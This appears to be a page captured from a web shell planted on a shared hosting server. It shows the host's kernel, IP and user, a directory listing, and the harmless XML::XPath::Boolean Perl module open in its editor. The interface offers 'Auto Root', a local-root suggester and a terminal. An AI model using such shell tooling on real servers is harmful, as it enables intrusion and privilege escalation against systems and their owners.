Linux ams-business-5.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 23.254.231.17 & Your IP : 216.73.217.115
Domains :
Cant Read [ /etc/named.conf ]
User : uxvsuhne
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
perl5 /
vendor_perl /
XML /
XPath /
Delete
Unzip
Name
Size
Permission
Date
Action
Node
[ DIR ]
drwxr-xr-x
2024-02-09 23:48
Boolean.pm
1.13
KB
-rw-r--r--
2017-07-28 16:18
Builder.pm
4.69
KB
-rw-r--r--
2017-07-28 16:18
Expr.pm
17.88
KB
-rw-r--r--
2017-07-28 16:18
Function.pm
11.8
KB
-rw-r--r--
2017-07-28 16:18
Literal.pm
1.82
KB
-rw-r--r--
2017-07-28 16:18
LocationPath.pm
1.27
KB
-rw-r--r--
2017-07-28 16:18
Node.pm
12.45
KB
-rw-r--r--
2017-07-28 16:18
NodeSet.pm
3.79
KB
-rw-r--r--
2017-07-28 16:19
Number.pm
1.62
KB
-rw-r--r--
2017-07-28 16:19
Parser.pm
23.36
KB
-rw-r--r--
2017-07-28 16:19
PerlSAX.pm
4.99
KB
-rw-r--r--
2017-07-28 16:19
Root.pm
622
B
-rw-r--r--
2017-07-28 16:19
Step.pm
13.02
KB
-rw-r--r--
2017-07-28 16:19
Variable.pm
816
B
-rw-r--r--
2017-07-28 16:19
XMLParser.pm
10.15
KB
-rw-r--r--
2017-07-28 16:19
Save
Rename
package XML::XPath::Boolean; $VERSION = '1.42'; use XML::XPath::Number; use XML::XPath::Literal; use strict; use warnings; use overload '""' => \&value, '<=>' => \&cmp; sub True { my $class = shift; my $val = 1; bless \$val, $class; } sub False { my $class = shift; my $val = 0; bless \$val, $class; } sub value { my $self = shift; $$self; } sub cmp { my $self = shift; my ($other, $swap) = @_; if ($swap) { return $other <=> $$self; } return $$self <=> $other; } sub to_number { XML::XPath::Number->new($_[0]->value); } sub to_boolean { $_[0]; } sub to_literal { XML::XPath::Literal->new($_[0]->value ? "true" : "false"); } sub string_value { return $_[0]->to_literal->value; } 1; __END__ =head1 NAME XML::XPath::Boolean - Boolean true/false values =head1 DESCRIPTION XML::XPath::Boolean objects implement simple boolean true/false objects. =head1 API =head2 XML::XPath::Boolean->True Creates a new Boolean object with a true value. =head2 XML::XPath::Boolean->False Creates a new Boolean object with a false value. =head2 value() Returns true or false. =head2 to_literal() Returns the string "true" or "false". =cut